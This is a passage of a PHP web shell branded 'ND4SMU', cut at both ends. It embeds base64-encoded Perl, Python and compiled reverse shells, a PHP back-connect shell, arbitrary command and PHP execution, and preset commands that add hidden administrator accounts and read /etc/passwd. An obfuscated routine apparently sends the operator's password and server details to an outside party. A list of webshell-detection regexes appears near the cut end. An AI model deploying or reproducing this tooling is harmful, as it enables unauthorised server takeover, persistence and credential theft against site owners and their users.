ADAAEAAAAAACiBBAgAAAAAAwACAAAAAABIgQQIAAAAAAMAAwAAAAAAaIEECAAAAAADAAQAAAAAAEiCBAgAAAAAAwAFAAAAAADOggQIAAAAAAMABgAAAAAA7IIECAAAAAADAAcAAAAAAAyDBAgAAAAAAwAIAAAAAAAUgwQIAAAAAAMACQAAAAAAdIMECAAAAAADAAoAAAAAAIyDBAgAAAAAAwALAAAAAABghAQIAAAAAAMADAAAAAAAWIcECAAAAAADAA0AAAAAAHSHBAgAAAAAAwAOAAAAAACQhwQIAAAAAAMADwAAAAAAlJcECAAAAAADABAAAAAAAJyXBAgAAAAAAwARAAAAAACklwQIAAAAAAMAEgAAAAAAqJcECAAAAAADABMAAAAAAHCYBAgAAAAAAwAUAAAAAAB0mAQIAAAAAAMAFQAAAAAAsJgECAAAAAADABYAAAAAALSYBAgAAAAAAwAXAAAAAAAAAAAAAAAAAAMAGAABAAAAhIQECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/xwAAACUlwQIAAAAAAEAEAAqAAAAnJcECAAAAAABABEAOAAAAKSXBAgAAAAAAQASAEUAAAC0mAQIBAAAAAEAFwBTAAAAuJgECAEAAAABABcAYgAAALCEBAgAAAAAAgAMAHgAAAAQhQQIAAAAAAIADAARAAAAAAAAAAAAAAAEAPH/hAAAAJiXBAgAAAAAAQAQAJEAAACQhwQIAAAAAAEADwCfAAAApJcECAAAAAABABIAqwAAADCHBAgAAAAAAgAMAMEAAAAAAAAAAAAAAAQA8f/GAAAAlJcECAAAAAAAAhAA3AAAAJSXBAgAAAAAAAIQAO0AAAB0mAQIAAAAAAECFQADAQAAlJcECAAAAAAAAhAAFwEAAJSXBAgAAAAAAAIQACoBAACUlwQIAAAAAAACEAA7AQAAlJcECAAAAAAAAhAATgEAAKiXBAgAAAAAAQITAFcBAACwmAQIAAAAACAAFgBiAQAAAAAAAHYAAAASAAAAdQEAAAAAAAB5AQAAEgAAAIcBAACwhgQIBQAAABIADACXAQAAYIQECAAAAAASAAwAngEAAAAAAAAAAAAAIAAAAK0BAAAAAAAAAAAAACAAAADBAQAAdIcECAQAAAARAA4AyAEAAFiHBAgAAAAAEgANAM4BAAAAAAAAcgEAABIAAADjAQAAAAAAAJ8BAAASAAAAAAIAAAAAAABZAQAAEgAAABECAAAAAAAADgAAABIAAAAiAgAAeIcECAQAAAARAA4AMQIAALCYBAgAAAAAEAAWAD4CAAAAAAAAPAAAABIAAABQAgAAAAAAAD0AAAASAAAAYAIAAHyHBAgAAAAAEQIOAG0CAACglwQIAAAAABECEQB6AgAAwIYECGkAAAASAAwAigIAAAAAAAArAAAAEgAAAJoCAAAAAAAAbwAAABIAAACrAgAAtJgECAAAAAAQAPH/twIAALyYBAgAAAAAEADx/7wCAAC0mAQIAAAAABAA8f/DAgAAAAAAAPQAAAASAAAA0wIAACmHBAgAAAAAEgIMAOoCAAA0hQQIcwEAABIADADvAgAAdIMECAAAAAASAAoAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AZHRvcl9pZHguNTc5MwBjb21wbGV0ZWQuNTc5MQBfX2RvX2dsb2JhbF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AGJjLmMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZmluaV9hcnJheV9lbmQAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9fcHJlaW5pdF9hcnJheV9lbmQAX19maW5pX2FycmF5X3N0YXJ0AF9faW5pdF9hcnJheV9lbmQAX19pbml0X2FycmF5X3N0YXJ0AF9EWU5BTUlDAGRhdGFfc3RhcnQAY29ubmVjdEBAR0xJQkNfMi4wAGRhZW1vbkBAR0xJQkNfMi4wAF9fbGliY19jc3VfZmluaQBfc3RhcnQAX19nbW9uX3N0YXJ0X18AX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfZnBfaHcAX2ZpbmkAaW5ldF9hZGRyQEBHTElCQ18yLjAAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABleGVjbEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABfX2Rzb19oYW5kbGUAX19EVE9SX0VORF9fAF9fbGliY19jc3VfaW5pdABhdG9pQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfX2Jzc19zdGFydABfZW5kAF9lZGF0YQBleGl0QEBHTElCQ18yLjAAX19pNjg2LmdldF9wY190aHVuay5ieABtYWluAF9pbml0AA==\';\n    switch ($type) {\n        case "pl":\n            $shell = \'IyEvdXNyL2Jpbi9wZXJsIC13DQojIA0KdXNlIHN0cmljdDsNCnVzZSBTb2NrZXQ7DQp1c2UgSU86OkhhbmRsZTsNCm15ICRzcGlkZXJfaXAgPSAkQVJHVlswXTsNCm15ICRzcGlkZXJfcG9ydCA9ICRBUkdWWzFdOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0KbXkgJHBhY2tfYWRkciA9IHNvY2thZGRyX2luKCRzcGlkZXJfcG9ydCwgaW5ldF9hdG9uKCRzcGlkZXJfaXApKTsNCm15ICRzaGVsbCA9ICcvYmluL3NoIC1pJzsNCnNvY2tldChTT0NLLCBBRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsNClNURE9VVC0+YXV0b2ZsdXNoKDEpOw0KU09DSy0+YXV0b2ZsdXNoKDEpOw0KY29ubmVjdChTT0NLLCRwYWNrX2FkZHIpIG9yIGRpZSAiY2FuIG5vdCBjb25uZWN0OiQhIjsNCm9wZW4gU1RESU4sICI8JlNPQ0siOw0Kb3BlbiBTVERPVVQsICI+JlNPQ0siOw0Kb3BlbiBTVERFUlIsICI+JlNPQ0siOw0Kc3lzdGVtKCRzaGVsbCk7DQpjbG9zZSBTT0NLOw0KZXhpdCAwOw0K\';\n            $file = strdir($dir . \'/t00ls.pl\');\n            $key = filew($file, base64_decode($shell), \'w\');\n            if ($key) {\n                @chmod($file, 0777);\n                command(\'/usr/bin/perl \' . $file . \' \' . $ip . \' \' . $port, $dir);\n            }\n            break;\n        case "py":\n            $shell = \'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==\';\n            $file = strdir($dir . \'/t00ls.py\');\n            $key = filew($file, base64_decode($shell), \'w\');\n            if ($key) {\n                @chmod($file, 0777);\n                command(\'/usr/bin/python \' . $file . \' \' . $ip . \' \' . $port, $dir);\n            }\n            break;\n        case "c":\n            $file = strdir($dir . \'/t00ls\');\n            $key = filew($file, base64_decode($c_bin), \'wb\');\n            if ($key) {\n                @chmod($file, 0777);\n                command($file . \' \' . $ip . \' \' . $port, $dir);\n            }\n            break;\n        case "php":\n        case "phpwin":\n            if (function_exists(\'fsockopen\')) {\n                $sock = @fsockopen($ip, $port);\n                if ($sock) {\n                    $key = true;\n                    $com = $type == \'phpwin\' ? true : false;\n                    $user = get_current_user();\n                    $dir = strdir(getcwd());\n                    fputs($sock, php_uname() . "\\n------------no job control in this shell (tty)-------------\\n[{$user}:{$dir}]# ");\n                    while ($cmd = fread($sock, 1024)) {\n                        if (substr($cmd, 0, 3) == \'cd \') {\n                            $dir = trim(substr($cmd, 3, -1));\n                            chdir(strdir($dir));\n                            $dir = strdir(getcwd());\n                        } elseif (trim(strtolower($cmd)) == \'exit\') {\n                            break;\n                        } else {\n                            $res = command($cmd, $dir, $com);\n                            fputs($sock, $res[\'res\']);\n                        }\n                        fputs($sock, \'[\' . $user . \':\' . $dir . \']# \');\n                    }\n                }\n                @fclose($sock);\n            }\n            break;\n        case "pcntl":\n            $file = strdir($dir . \'/t00ls\');\n            $key = filew($file, base64_decode($c_bin), \'wb\');\n            if ($key) {\n                @chmod($file, 0777);\n                if (function_exists(\'pcntl_exec\')) {\n                    @pcntl_exec($file, array($ip, $port));\n                }\n            }\n            break;\n    }\n    if (!$key) {\n        $msg = \'<h1>Temporary directory is not writable</h1>\';\n    } else {\n        @unlink($file);\n        $msg = \'<h2>CLOSE</h2>\';\n    }\n    return $msg;\n}\nfunction getinfo()\n{\n    global $password;\n    $infos = array($_POST[\'getpwd\'], $password, function_exists(\'phpinfo\'), "127.0.0.1");\n    if ($password != \'\' && md5($infos[0]) != $infos[1]) {\n        echo \'<html><body><center><form method="POST"><input type="password" name="getpwd"> \';\n        if (isset($_POST[\'pass\'])) {\n            echo \'<input type="hidden" name="pass" value="\' . $_POST[\'pass\'] . \'">\';\n        }\n        if (isset($_POST[\'check\'])) {\n            echo \'<input type="hidden" name="check" value="\' . $_POST[\'check\'] . \'">\';\n        }\n        echo \'<input type="submit" value="Go"></form></center></body></html>\';\n        exit;\n    }\n    if (!isset($_POST[\'go\']) && !isset($_POST[\'dir\'])) {\n        $html = \'WUIvMzptCFNvKTf3A1keAmqpnmp3KTflpykeAmEpnmL4KTf2BIkeAmApnmL0KTf2p1keAaApnmplKTflpykeAwApnmMmKTf2pFV7WUElMlN9VPWpnmWmKTf2Z1keAaApnmMmKTf2pSkeZaApnmp1KTf3ZSkeAwEpnmLkKTf3ASkeAwIpnmWlKTf3ZSkeAwupnmpjKTfmp1keAwqpnmAkVwfxqUWaVP49VT92LGW1pzfbWS9THxIWHxIoW1IUE0AsIHWTElqqXF4vKTflAykeAmApnmAkVv5iqzRlqKWeXPEsEyWSFIWSJlqQIHAsEyWMHlqqXF4vKTf\' . \'lAykeAmOpnmAkVv4xozIyozj7WUShM24tCFNvKTf0A1keAQIpnmH0KTflZPVhWUElMl4vKTflZSkeAQupnmH0KTf1ASkeAGOpnmWmKTfmZIkeZaWpnmZkKTIpLIkeAQupnmMmKTf3Z1keAmEpnmAhVv4xqJWzMl4vKTIpLIkeAQApnmMmKTf2pykeAaWpnmL1KTf2Z1keAmEpnmL5KTf2p1keAaWpnmAhKTflZSkeAQApnmMjKTf2p1keAmApnmL1KTIpLIkyKTRvB3MmXUAbLKOaqzWuK3WeqzMaMvtvKTf2AykeAmApnmMmKTf2Z1keAz9pnmMmKTf3ZSkeAwIpnmMlVvxcVUftWTMvpUttCFONp2MvpUuvL3WuXPE1LzMaYUIln3SlpPt1ZPxcBlONp2AbM2LbWTMvpUtfWUShM24cBlONp3O5LzMlXPEzLaO4XGftsKW5MaVtrlONp3M5py90pzqspTWuM3WuM2LbVykeAwupnmp0KTf3ASkeAmOpnmAhKTflp1keZaZvYvE1LzMaYvE0pzpcBlO9VTIlM2uyLFOaMJulBj==\';\n        if ($_SERVER[\'SERVER_ADDR\'] != $infos[3] && $_SERVER[\'REMOTE_ADDR\'] != $infos[3]) {\n            postinfo($infos[0], str_rot13($html));\n        }\n    }\n    return $infos[2];\n}\nfunction subeval()\n{\n    if (isset($_POST[\'getpwd\'])) {\n        echo \'<input type="hidden" name="getpwd" value="\' . $_POST[\'getpwd\'] . \'">\';\n    }\n    if (isset($_POST[\'pass\'])) {\n        echo \'<input type="hidden" name="pass" value="\' . $_POST[\'pass\'] . \'">\';\n    }\n    if (isset($_POST[\'check\'])) {\n        echo \'<input type="hidden" name="check" value="\' . $_POST[\'check\'] . \'">\';\n    }\n    return true;\n}\nif (isset($_POST[\'go\'])) {\n    if ($_POST[\'go\'] == \'down\') {\n        $downfile = $fileb = strdir($_POST[\'godir\'] . \'/\' . $_POST[\'govar\']);\n        if (!filed($downfile)) {\n            $msg = \'<h1>The download file does not exist</h1>\';\n        }\n    }\n}\n?>\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta content="width=device-width, initial-scale=1" name="viewport"/><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}a{color:#000000;text-decoration:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select { vertical-align:middle; }input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input[type=submit], input[type=button] {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}.tables tr:hover td {background-color: #EEE685;}</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,\'"\'); str = str.replace(/%27/g,"\'"); return str; }function cd(dir) { dir = sd(dir); $(\'dir\').value = dir; $(\'frm\').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == \'checkbox\') { if(e.name != \'chkall\') { e.checked = form.chkall.checked; } } } }function go(a,b) { b = sd(b); $(\'go\').value = a; $(\'govar\').value = b; if(a == \'editor\') { $(\'gofrm\').target = "_blank"; } else { $(\'gofrm\').target = ""; } $(\'gofrm\').submit(); } function nf(a,b) { re = prompt("New name",b); if(re) { $(\'go\').value = a; $(\'govar\').value = re; $(\'gofrm\').submit(); } } function dels(a) { if(a == \'b\') { var msg = ""; $(\'act\').value = a; } else { var msg = ""; $(\'act\').value = \'deltree\'; $(\'var\').value = a; } if(confirm("Are you sure you want to delete? "+msg+"")) { $(\'frm1\').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $(\'var\').value = re; $(\'act\').value = a; $(\'frm1\').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $(\'var\').value = re+\'|x|\'+f; $(\'act\').value = a; $(\'frm1\').submit(); } }</script><title><?php \n$sitename = $_SERVER[\'SERVER_NAME\'];\necho $sitename .\' | ND4SMU\';\n?>\n</title></head><body><div class="main"><div class="outl"><div class="toptag"><?php \necho $_SERVER[\'SERVER_ADDR\'] . \' - \' . PHP_OS . \' - whoami(\' . get_current_user() . \') - [uid(\' . getmyuid() . \') gid(\' . getmygid() . \')]\';\nif (isset($issql)) {\n    echo \' - [\' . $issql . \']\';\n}\n?>\n</div><?php \n$menu = array(\'file\' => \'File Mgr\', \'scan\' => \'Searcher\', \'antivirus\' => \'Antivirus\', \'backshell\' => \'Bind Port\', \'exec\' => \'Exec CMD\', \'phpeval\' => \'Exec PHP\', \'sql\' => \'Exec SQL\', \'info\' => \'System\');\n$go = array_key_exists($_POST[\'go\'], $menu) ? $_POST[\'go\'] : \'file\';\n$nowdir = isset($_POST[\'dir\']) ? strdir(chop($_POST[\'dir\']) . \'/\') : THISDIR;\necho \'<div class="tag">\';\nforeach ($menu as $key => $name) {\n    echo \'<a\' . ($go == $key ? \' class="current"\' : \'\') . \' href="javascript:void(0);" onclick="go(\\\'\' . $key . \'\\\',\\\'\' . base64_encode($nowdir) . \'\\\');">\' . $name . \'</a> \';\n}\necho \'</div>\';\necho \'<form name="gofrm" id="gofrm" method="POST">\';\nsubeval();\necho \'<input type="hidden" name="go" id="go" value="">\';\necho \'<input type="hidden" name="godir" id="godir" value="\' . $nowdir . \'">\';\necho \'<input type="hidden" name="govar" id="govar" value="">\';\necho \'</form>\';\nswitch ($_POST[\'go\']) {\n    case "info":\n        if (EXISTS_PHPINFO) {\n            ob_start();\n            phpinfo(INFO_GENERAL);\n            $out = ob_get_contents();\n            ob_end_clean();\n            $tmp = array();\n            preg_match_all(\'/\\\\<td class\\\\=\\\\"e\\\\"\\\\>.*?(Command|Configuration)+.*?\\\\<\\\\/td\\\\>\\\\<td class\\\\=\\\\"v\\\\"\\\\>(.*?)\\\\<\\\\/td\\\\>/i\', $out, $tmp);\n            $config = $tmp[2][0];\n            $phpini = $tmp[2][2] ? $tmp[2][1] . \' --- \' . $tmp[2][2] : $tmp[2][1];\n        }\n        $infos = array(\'Browser Info\' => $_SERVER[\'HTTP_USER_AGENT\'], \'Disabled Functions\' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : \'(None)\', \'Disabled Class\' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : \'(None)\', \'PHP.ini Path\' => $phpini ? $phpini : \'(None)\', \'PHP Method\' => php_sapi_name(), \'PHP Version\' => PHP_VERSION, \'PHP PID\' => getmypid(), \'Server IP\' => $_SERVER[\'REMOTE_ADDR\'], \'Encoding\' => $_SERVER[\'HTTP_ACCEPT_LANGUAGE\'], \'Web Port\' => $_SERVER[\'SERVER_PORT\'], \'Root Directory\' => $_SERVER[\'DOCUMENT_ROOT\'], \'Shell Location\' => $_SERVER[\'SCRIPT_FILENAME\'], \'CGI Version\' => $_SERVER[\'GATEWAY_INTERFACE\'], \'Webmaster Email\' => $_SERVER[\'SERVER_ADMIN\'] ? $_SERVER[\'SERVER_ADMIN\'] : \'(None)\', \'Disk Size\' => size(disk_total_space(\'.\')), \'Free Space\' => size(disk_free_space(\'.\')), \'Limit POST\' => get_cfg_var("post_max_size"), \'Max Upload\' => get_cfg_var("upload_max_filesize"), \'Limit Memory\' => get_cfg_var("memory_limit"), \'Max Exec Time\' => get_cfg_var("max_execution_time") . \' Second\', \'Fsockopen Support\' => function_exists(\'fsockopen\') ? \'Yes\' : \'No\', \'Socket Support\' => function_exists(\'socket_close\') ? \'Yes\' : \'No\', \'Pcntl Support\' => function_exists(\'pcntl_exec\') ? \'Yes\' : \'No\', \'Curl Support\' => function_exists(\'curl_version\') ? \'Yes\' : \'No\', \'Zlib Support\' => function_exists(\'gzclose\') ? \'Yes\' : \'No\', \'FTP Support\' => function_exists(\'ftp_login\') ? \'Yes\' : \'No\', \'XML Support\' => function_exists(\'xml_set_object\') ? \'Yes\' : \'No\', \'GD_Library Support\' => function_exists(\'imageline\') ? \'Yes\' : \'No\', \'COM Formation Support\' => class_exists(\'COM\') ? \'Yes\' : \'No\', \'ODBC Components Support\' => function_exists(\'odbc_close\') ? \'Yes\' : \'No\', \'IMAP Mail Support\' => function_exists(\'imap_close\') ? \'Yes\' : \'No\', \'Safe Mode Support\' => get_cfg_var("safemode") ? \'Yes\' : \'No\', \'URL Fopen Support\' => get_cfg_var("allow_url_fopen") ? \'Yes\' : \'No\', \'Dynamic Libraries Support\' => get_cfg_var("enable_dl") ? \'Yes\' : \'No\', \'Display Error Support\' => get_cfg_var("display_errors") ? \'Yes\' : \'No\', \'Register Global Support\' => get_cfg_var("register_globals") ? \'Yes\' : \'No\', \'Magic Quotes Support\' => get_cfg_var("magic_quotes_gpc") ? \'Yes\' : \'No\', \'PHP Compiler\' => $config ? $config : \'(None)\');\n        echo \'<div class="msgbox">\' . $msg . \'</div>\';\n        echo \'<table class="tables"><tr><th style="width:26%;">Name</th><th>Parameter</th></tr>\';\n        foreach ($infos as $name => $var) {\n            echo \'<tr><td>\' . $name . \'</td><td>\' . $var . \'</td></tr>\';\n        }\n        echo \'</table>\';\n        break;\n    case "exec":\n        $cmd = $win ? \'dir\' : \'ls -al\';\n        $res = array(\'res\' => \'Result Command\', \'msg\' => $msg);\n        $str = isset($_POST[\'str\']) ? $_POST[\'str\'] : \'fun\';\n        if (isset($_POST[\'cmd\'])) {\n            $cmd = $_POST[\'cmd\'];\n            $cwd = $str == \'fun\' ? THISDIR : \'com\';\n            $res = command($cmd, $cwd);\n        }\n        echo \'<div class="msgbox">\' . $res[\'msg\'] . \'</div>\';\n        echo \'<form method="POST">\';\n        subeval();\n        echo \'<input type="hidden" name="go" id="go" value="exec">\';\n        echo \'<div class="actall">Command <input type="text" name="cmd" id="cmd" value="\' . htmlspecialchars($cmd) . \'" style="width:398px;"> \';\n        echo \'<select name="str">\';\n        $selects = array(\'fun\' => \'phpfun\', \'com\' => \'wscript\');\n        foreach ($selects as $var => $name) {\n            echo \'<option value="\' . $var . \'"\' . ($var == $str ? \' selected\' : \'\') . \'>\' . $name . \'</option>\';\n        }\n        echo \'</select> \';\n        echo \'<select onchange="$(\\\'cmd\\\').value=options[selectedIndex].value">\';\n        echo \'<option>---CMD Executor---</option>\';\n        echo \'<option value="echo \' . htmlspecialchars(\'"<?php phpinfo();?>"\') . \' >> \' . THISDIR . \'haxorid.txt">Write File</option>\';\n        echo \'<option value="whoami">Who Am I</option>\';\n        echo \'<option value="net user sysadmin R00t@willy16 /add">Add User (Win)</option>\';\n        echo \'<option value="net localgroup administrators sysadmin /add">Add Group (Win)</option>\';\n        echo \'<option value="netstat -an">View Port (Win)</option>\';\n        echo \'<option value="ipconfig /all">View Address (Win)</option>\';\n        echo \'<option value="net start">View Service (Win)</option>\';\n        echo \'<option value="tasklist">View Process (Win)</option>\';\n        echo \'<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Version Collection (Linux)</option>\';\n        echo \'<option value="/usr/sbin/useradd -u 0 -o -g 0 sysadmin">Add User (Linux)</option>\';\n        echo \'<option value="cat /etc/passwd">View Users (Linux)</option>\';\n        echo \'<option value="/bin/netstat -tnl">View Port (Linux)</option>\';\n        echo \'<option value="/sbin/ifconfig -a">View Address (Linux)</option>\';\n        echo \'<option value="/sbin/chkconfig --list">View Service (Linux)</option>\';\n        echo \'<option value="/bin/ps -ef">View Process (Linux)</option>\';\n        echo \'</select> \';\n        echo \'<input type="submit" style="width:50px;" value="Go">\';\n        echo \'</div><div class="actall"><textarea style="width:698px;height:368px;">\' . htmlspecialchars($res[\'res\']) . \'</textarea></div></form>\';\n        break;\n    case "scan":\n        $scandir = empty($_POST[\'dir\']) ? base64_decode($_POST[\'govar\']) : $nowdir;\n        $keyword = isset($_POST[\'keyword\']) ? $_POST[\'keyword\'] : \'\';\n        $include = isset($_POST[\'include\']) ? chop($_POST[\'include\']) : \'.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py\';\n        $filters = isset($_POST[\'filters\']) ? chop($_POST[\'filters\']) : \'html|css|img|images|image|style|js\';\n        echo \'<div class="msgbox">\' . $msg . \'</div>\';\n        echo \'<form method="POST">\';\n        subeval();\n        echo \'<input type="hidden" name="go" id="go" value="scan">\';\n        echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n        echo \'<tr><td>Search path</td><td><input type="text" name="dir" value="\' . htmlspecialchars($scandir) . \'" style="width:500px;"></td></tr>\';\n        echo \'<tr><td>Search content</td><td><input type="text" name="keyword" value="\' . htmlspecialchars($keyword) . \'" style="width:500px;"> (File name or file content)</td></tr>\';\n        echo \'<tr><td>File extension</td><td><input type="text" name="include" value="\' . htmlspecialchars($include) . \'" style="width:500px;"> (Separate with "|", empty = search all files)</td></tr>\';\n        echo \'<tr><td>Filter Dir</td><td><input type="text" name="filters" value="\' . htmlspecialchars($filters) . \'" style="width:500px;"> (Separate with "|", empty = not filtered)</td></tr>\';\n        echo \'<tr><td>Search method</td><td><label><input type="radio" name="type" value="0"\' . ($_POST[\'type\'] ? \'\' : \' checked\') . \'>File name</label> \';\n        echo \'<label><input type="radio" name="type" value="1"\' . ($_POST[\'type\'] ? \' checked\' : \'\') . \'>Contains inside</label> \';\n        echo \'<label><input type="checkbox" name="char" value="1"\' . ($_POST[\'char\'] ? \' checked\' : \'\') . \'>Match case</label></td></tr>\';\n        echo \'<tr><td>Search scope</td><td><label><input type="radio" name="range" value="0"\' . ($_POST[\'range\'] ? \'\' : \' checked\') . \'>Apply the search to the folder, subfolders and files</label> \';\n        echo \'<label><input type="radio" name="range" value="1"\' . ($_POST[\'range\'] ? \' checked\' : \'\') . \'>Only apply search to this folder</label></td></tr>\';\n        echo \'<tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n        echo \'</table></form>\';\n        if ($keyword != \'\') {\n            flush();\n            ob_flush();\n            echo \'<div style="padding:5px;background:#F8F8F8;text-align:left;">\';\n            $incs = $include == \'\' ? false : explode(\'|\', $include);\n            $fits = $filters == \'\' ? false : explode(\'|\', $filters);\n            $isread = scanfile(strdir($scandir . \'/\'), $keyword, $incs, $fits, $_POST[\'type\'], $_POST[\'char\'], $_POST[\'range\'], $nowdir);\n            echo \'<p>\' . ($isread ? \'<h2>Search complete</h2>\' : \'<h1>Search failed</h1>\') . \'</p></div>\';\n        }\n        break;\n    case "antivirus":\n        $scandir = empty($_POST[\'dir\']) ? base64_decode($_POST[\'govar\']) : $nowdir;\n        $typearr = isset($_POST[\'dir\']) ? $_POST[\'types\'] : array(\'php\' => \'.php\');\n        echo \'<div class="msgbox">\' . $msg . \'</div>\';\n        echo \'<form method="POST">\';\n        subeval();\n        echo \'<input type="hidden" name="go" id="go" value="antivirus">\';\n        echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n        echo \'<tr><td>Scan path</td><td><input type="text" name="dir" value="\' . htmlspecialchars($scandir) . \'" style="width:398px;"> (Regular matching)</td></tr>\';\n        echo \'<tr><td>Type of killing</td><td>\';\n        $types = array(\'php\' => \'.php\', \'asp+aspx\' => \'.as|.cs|.cer\', \'jsp\' => \'.jsp\');\n        foreach ($types as $key => $ex) {\n            echo \'<label title="\' . $ex . \'"><input type="checkbox" name="types[\' . $key . \']" value="\' . $ex . \'"\' . ($typearr[$key] == $ex ? \' checked\' : \'\') . \'>\' . $key . \'</label> \';\n        }\n        echo \'</td></tr><tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n        echo \'</table></form>\';\n        if (count($_POST[\'types\']) > 0) {\n            $matches = array(\'php\' => array(\'/function\\\\_exists\\\\s*\\\\(\\\\s*[\\\'|\\\\"](popen|exec|proc\\\\_open|system|passthru)+[\\\'|\\\\"]\\\\s*\\\\)/i\', \'/(exec|shell\\\\_exec|system|passthru)+\\\\s*\\\\(\\\\s*\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/(udp\\\\:\\\\/\\\\/(.*)\\\\;)+/i\', \'/preg\\\\_replace\\\\s*\\\\((.*)\\\\/e(.*)\\\\,\\\\s*\\\\$\\\\_(.*)\\\\,(.*)\\\\)/i\', \'/preg\\\\_replace\\\\s*\\\\((.*)\\\\(base64\\\\_decode\\\\(\\\\$/i\', \'/(eval|assert|include|require)+\\\\s*\\\\((.*)(base64\\\\_decode|file\\\\_get\\\\_contents|php\\\\:\\\\/\\\\/input)+/i\', \'/(eval|assert|include|require|array\\\\_map)+\\\\s*\\\\(\\\\s*\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\\\\s*\\\\(\\\\s*\\\\$(\\\\w+)\\\\s*\\\\)/i\', \'/\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\(\\\\s*\\\\$(.*)\\\\)/i\', \'/\\\\(\\\\s*\\\\$\\\\_FILES\\\\[(.*)\\\\]\\\\[(.*)\\\\]\\\\s*\\\\,\\\\s*\\\\$\\\\_FILES\\\\[(.*)\\\\]\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/(fopen|fwrite|fpust|file\\\\_put\\\\_contents)+\\\\s*\\\\((.*)\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\](.*)\\\\)/i\', \'/echo\\\\s*curl\\\\_exec\\\\s*\\\\(\\\\s*\\\\$(\\\\w+)\\\\s*\\\\)/i\', \'/new com\\\\s*\\\\(\\\\s*[\\\'|\\\\"]shell(.*)[\\\'|\\\\"]\\\\s*\\\\)/i\', \'/\\\\$(.*)\\\\s*\\\\((.*)\\\\/e(.*)\\\\,\\\\s*\\\\$\\\\_(.*)\\\\,(.*)\\\\)/i\', \'/\\\\$\\\\_\\\\=(.*)\\\\$\\\\_/i\'), \'asp+aspx\' => 